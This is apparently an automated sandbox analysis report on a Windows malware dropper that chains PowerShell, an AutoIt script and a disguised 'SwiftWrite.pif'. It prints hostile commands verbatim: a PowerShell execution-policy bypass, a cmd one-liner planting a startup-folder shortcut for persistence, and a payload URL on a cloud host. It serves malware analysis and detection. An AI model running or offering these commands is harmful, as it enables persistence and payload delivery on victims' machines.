Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978337B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00007FF7978337B0
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797855BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW, 0_2_00007FF797855BC0
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978C7634 LoadLibraryA,GetProcAddress, 0_2_00007FF7978C7634
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79789D868 WaitForSingleObject,UnloadUserProfile,CloseHandle,CloseHandle,GetProcessHeap,HeapFree, 0_2_00007FF79789D868
Enables debug privileges
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978557E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF7978557E4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978559C8 SetUnhandledExceptionFilter, 0_2_00007FF7978559C8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797878FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 0_2_00007FF797878FE4
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79786AF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 0_2_00007FF79786AF58
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0048A354 SetUnhandledExceptionFilter, 3_2_0048A354
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_0048A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_0048A385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F4A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 8_2_00F4A385
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F4A354 SetUnhandledExceptionFilter, 8_2_00F4A354

HIPS / PFW / Operating System Protection Evasion
barindex
Bypasses PowerShell execution policy
Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\ProfileDetails.ps1"
Contains functionality to execute programs as a different user
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79789CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 0_2_00007FF79789CE68
Contains functionality to launch a program with higher privileges
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978337B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 0_2_00007FF7978337B0
Contains functionality to simulate keystroke presses
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978A9420 SendInput,keybd_event, 0_2_00007FF7978A9420
Contains functionality to simulate mouse events
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978AD1A4 mouse_event, 0_2_00007FF7978AD1A4
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\Public\InformationCheck.exe "C:\Users\Public\InformationCheck.exe" C:\Users\Public\Details.au3 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G" Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: C:\Users\Public\InformationCheck.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Users\Public\InformationCheck.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79789C858 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 0_2_00007FF79789C858
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79789D540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 0_2_00007FF79789D540
Source: file.exe, 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.1693624835.000002B512320000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.1700160371.000002B512246000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: file.exe, InformationCheck.exe, SwiftWrite.pif Binary or memory string: Shell_TrayWnd
Contains functionality to query CPU information (cpuid)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79786FD20 cpuid 0_2_00007FF79786FD20
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF79786BEF8 GetSystemTimeAsFileTime, 0_2_00007FF79786BEF8
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797892BCF GetUserNameW, 0_2_00007FF797892BCF
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797872650 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 0_2_00007FF797872650
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF797851D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary, 0_2_00007FF797851D80
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
OS version to string mapping found (often used in BOTs)
Source: SwiftWrite.pif Binary or memory string: WIN_81
Source: SwiftWrite.pif Binary or memory string: WIN_XP
Source: SwiftWrite.pif Binary or memory string: WIN_XPe
Source: SwiftWrite.pif Binary or memory string: WIN_VISTA
Source: file.exe, 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: SwiftWrite.pif Binary or memory string: WIN_7
Source: SwiftWrite.pif Binary or memory string: WIN_8
Source: file.exe, 00000000.00000003.1700160371.000002B512246000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978C4074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 0_2_00007FF7978C4074
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF7978C3940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket, 0_2_00007FF7978C3940
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004D696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 3_2_004D696E
Source: C:\Users\Public\InformationCheck.exe Code function: 3_2_004D6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 3_2_004D6E32
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F9696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 8_2_00F9696E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif Code function: 8_2_00F96E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 8_2_00F96E32
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528956 Sample: file.exe Startdate: 08/10/2024 Architecture: WINDOWS Score: 100 47 nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs 2->47 49 my.cloudme.com 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 Sigma detected: Drops script at startup location 2->53 55 Binary is likely a compiled AutoIt script file 2->55 57 8 other signatures 2->57 10 file.exe 2 2->10         started        14 wscript.exe 1 1 2->14         started        signatures3 process4 file5 39 C:\Users\Public\InformationCheck.exe, PE32 10->39 dropped 41 C:\Users\Public\ProfileDetails.ps1, ASCII 10->41 dropped 61 Binary is likely a compiled AutoIt script file 10->61 63 Bypasses PowerShell execution policy 10->63 65 Drops PE files to the user root directory 10->65 16 powershell.exe 14 17 10->16         started        67 Windows Scripting host queries suspicious COM object (likely to drop second stage) 14->67 20 SwiftWrite.pif 14->20         started        signatures6 process7 dnsIp8 45 my.cloudme.com 83.140.241.4, 443, 49730 PORT80SE Sweden 16->45 33 C:\Users\Public\Details.au3, Unicode 16->33 dropped 22 InformationCheck.exe 4 16->22         started        26 conhost.exe 16->26         started        file9 process10 file11 35 C:\Users\user\AppData\...\SwiftWrite.pif, PE32 22->35 dropped 37 C:\Users\user\AppData\Local\...\SwiftWrite.js, ASCII 22->37 dropped 59 Drops PE files with a suspicious file extension 22->59 28 cmd.exe 2 22->28         started        signatures12 process13 file14 43 C:\Users\user\AppData\...\SwiftWrite.url, MS 28->43 dropped 31 conhost.exe 28->31         started        process15
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
83.140.241.4
 my.cloudme.com Sweden
39369 PORT80SE false

Contacted Domains

Name IP Active
my.cloudme.com 83.140.241.4 true
nbhkmKSQnaDrIkubbvvLMhHdgigs.nbhkmKSQnaDrIkubbvvLMhHdgigs unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://my.cloudme.com/v1/ws2/:updatemake/:reality/reality.txt false
    		unknown